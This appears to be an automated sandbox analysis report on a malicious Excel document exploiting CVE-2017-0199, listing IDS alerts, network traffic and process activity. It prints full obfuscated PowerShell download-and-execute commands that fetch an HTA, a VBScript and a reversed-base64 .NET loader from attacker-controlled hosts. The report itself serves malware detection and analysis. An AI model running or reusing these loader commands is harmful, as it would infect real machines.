      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165

      Networking

      Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.210.215.8:80 -> 192.168.2.22:49164
      Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.210.215.8:80 -> 192.168.2.22:49162
      Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49172
      Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49174
      Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1 Host: drive.google.com Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1 Host: drive.usercontent.google.com Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1 Host: 192.210.215.8 Connection: Keep-Alive
      Source: Joe Sandbox View IP Address: 24.199.88.84
      Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
      Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49170 -> 192.210.215.8:80
      Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.210.215.8:80
      Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: u4u.kids Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: u4u.kids Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.210.215.8If-Range: "20b6a-6251ccc7de906"
      Source: global trafficHTTP traffic detected: GET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMTConnection: Keep-AliveHost: 192.210.215.8If-None-Match: "20b6a-6251ccc7de906"
      Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49171 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88E54B18 URLDownloadToFileW,5_2_000007FE88E54B18
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CC8246.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: u4u.kids
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:40:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 299Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 192.210.215.8 Port 80</address></body></html>
      Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/
      Source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/created
      Source: powershell.exe, 00000011.00000002.488335048.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIF
      Source: mshta.exe, 0000000F.00000002.479518497.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000000E.00000002.517859410.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 0000001B.00000002.539375393.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6
      Source: powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
      Source: powershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: mshta.exe, 00000004.00000003.426419047.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427286039.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/
      Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/K
      Source: mshta.exe, 0000000F.00000002.479317402.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 5457144.xls, 54330000.0.drString found in binary or memory: https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&S
      Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/b
      Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/nt
      Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49169 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

      System Summary

      Source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: A & C Metrology OC 5457144.xls OLE: Microsoft Excel 2007+
      Source: 54330000.0.dr OLE: Microsoft Excel 2007+
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].hta
      Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZh
ZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88F204B8
      Source: A & C Metrology OC 5457144.xls OLE indicator, VBA macros: true
      Source: A & C Metrology OC 5457144.xlsStream path 'MBD0026E5D6/\x1Ole' : https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingPgPo]RcYh6ze9_VNS+,vnXeoYkbU1jEboSE5JkrKyn157wixguzleFEArdkKcmIoWrmxUgyeXYtvZrCsnOn0Klj1Hxipqfv2KfCKhpGM3DDU0azxuzqG6B8r8Ao5i0QerwgM`EkU%R]2Cz
      Source: 54330000.0.drStream path 'MBD0026E5D6/\x1Ole' : https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingPgPo]RcYh6ze9_VNS+,vnXeoYkbU1jEboSE5JkrKyn157wixguzleFEArdkKcmIoWrmxUgyeXYtvZrCsnOn0Klj1Hxipqfv2KfCKhpGM3DDU0azxuzqG6B8r8Ao5i0QerwgM`EkU%R]2Cz
      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2318
      Source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engine Classification label: mal100.expl.evad.winXLS@31/45@7/4
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\54330000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR9387.tmp
      Source: A & C Metrology OC 5457144.xls OLE indicator, Workbook stream: true
      Source: 54330000.0.dr OLE indicator, Workbook stream: true
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p$......}..w.............e.........l....._......(.P.............t...............T.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......p$......}..w.............e.........l....._......(.P.............t.......................................
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: A & C Metrology OC 5457144.xlsReversingLabs: Detection: 18%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
